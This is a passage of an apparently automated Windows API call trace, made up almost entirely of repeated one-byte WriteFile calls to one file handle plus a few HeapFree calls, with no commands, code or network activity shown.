lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.630] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.631] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.631] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.631] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.631] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.631] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.631] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.631] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.631] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.631] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.631] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.632] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.632] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.632] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.632] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.632] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.632] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.632] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.632] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.632] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.632] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.633] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.633] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.633] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.633] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.633] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.633] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.633] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.633] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.633] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.633] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.633] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.634] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.634] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.634] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.634] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.634] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.634] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.634] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.634] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.634] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.634] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.634] WriteFile (in: hFile=0x358, lpBuffer=0x29a7ea8*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x29a7ea8*, lpNumberOfBytesWritten=0x19f640*=0x12, lpOverlapped=0x0) returned 1 [0116.634] WriteFile (in: hFile=0x358, lpBuffer=0x29aab58*, nNumberOfBytesToWrite=0x9, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x29aab58*, lpNumberOfBytesWritten=0x19f670*=0x9, lpOverlapped=0x0) returned 1 [0116.635] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab58 | out: hHeap=0x29a0000) returned 1 [0116.635] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a7d60 | out: hHeap=0x29a0000) returned 1 [0116.635] WriteFile (in: hFile=0x358, lpBuffer=0x19f693*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f693*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.635] WriteFile (in: hFile=0x358, lpBuffer=0x19f693*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f693*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.635] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.635] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.635] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.635] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.635] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.635] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.635] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.635] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.636] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.636] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.636] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.636] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.636] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.636] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.636] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.636] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.636] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.636] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.636] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.637] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.637] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.637] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.637] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.637] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.637] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.637] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.637] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.637] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.637] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.637] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.638] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.638] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.638] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.638] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.638] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.638] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.638] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.638] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.638] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.638] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.638] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.639] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.639] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.639] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.639] WriteFile (in: hFile=0x358, lpBuffer=0x29a8210*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x29a8210*, lpNumberOfBytesWritten=0x19f640*=0x10, lpOverlapped=0x0) returned 1 [0116.639] WriteFile (in: hFile=0x358, lpBuffer=0x29aaac8*, nNumberOfBytesToWrite=0x9, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x29aaac8*, lpNumberOfBytesWritten=0x19f670*=0x9, lpOverlapped=0x0) returned 1 [0116.639] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaac8 | out: hHeap=0x29a0000) returned 1 [0116.639] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a80c8 | out: hHeap=0x29a0000) returned 1 [0116.639] WriteFile (in: hFile=0x358, lpBuffer=0x19f693*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f693*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.639] WriteFile (in: hFile=0x358, lpBuffer=0x19f693*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f693*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.639] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.639] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.639] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.640] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f634, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f634*=0x1, lpOverlapped=0x0) returned 1 [0116.640] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f670, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f670*=0x1, lpOverlapped=0x0) returned 1 [0116.640] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, 